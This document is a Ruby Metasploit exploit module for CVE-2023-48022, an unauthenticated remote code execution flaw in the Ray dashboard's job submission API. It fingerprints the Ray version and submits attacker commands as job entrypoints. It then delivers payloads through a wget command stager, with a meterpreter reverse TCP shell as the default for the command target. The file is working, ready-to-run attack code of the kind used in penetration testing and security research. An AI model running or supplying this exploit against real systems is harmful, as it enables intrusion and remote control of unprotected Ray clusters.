    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ray Agent Job RCE',        'Description' => %q{          RCE in Ray via the agent job submission endpoint.          This is intended functionality as Ray's main purpose is executing arbitrary workloads.          By default Ray has no authentication.        },        'Author' => [          'sierrabearchell',                      # Vulnerability discovery          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module          'Takahiro Yokoyama'                     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-48022'],          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],          ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']        ],        'CmdStagerFlavor' => %i[wget],        'Payload' => {          'DisableNops' => true        },        'Platform' => %w[linux],        'Targets' => [          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'MeterpreterTryToFork' => true              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-11-15',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8265),      ]    )  end  def get_job_data(cmd)    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/jobs/'),      'data' => { 'entrypoint' => cmd }.to_json    })    unless res && res.code == 200      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),        'data' => { 'entrypoint' => cmd }.to_json      })    end    return unless res && res.code == 200    JSON.parse(res.body)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/version')    })    return Exploit::CheckCode::Unknown unless res && res.code == 200    ray_version = res.get_json_document['ray_version']    return Exploit::CheckCode::Unknown unless ray_version    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')    @job_data = get_job_data('ls')    return Exploit::CheckCode::Vulnerable unless @job_data.nil?    Exploit::CheckCode::Appears  end  def exploit    @job_data ||= get_job_data('ls')    if @job_data      print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")    end    case target['Type']    when :nix_cmd      execute_command(payload.encoded)    else      execute_cmdstager({ flavor: :wget })    end  end  def execute_command(cmd, _opts = {})    get_job_data(cmd)  endend

Tag

#js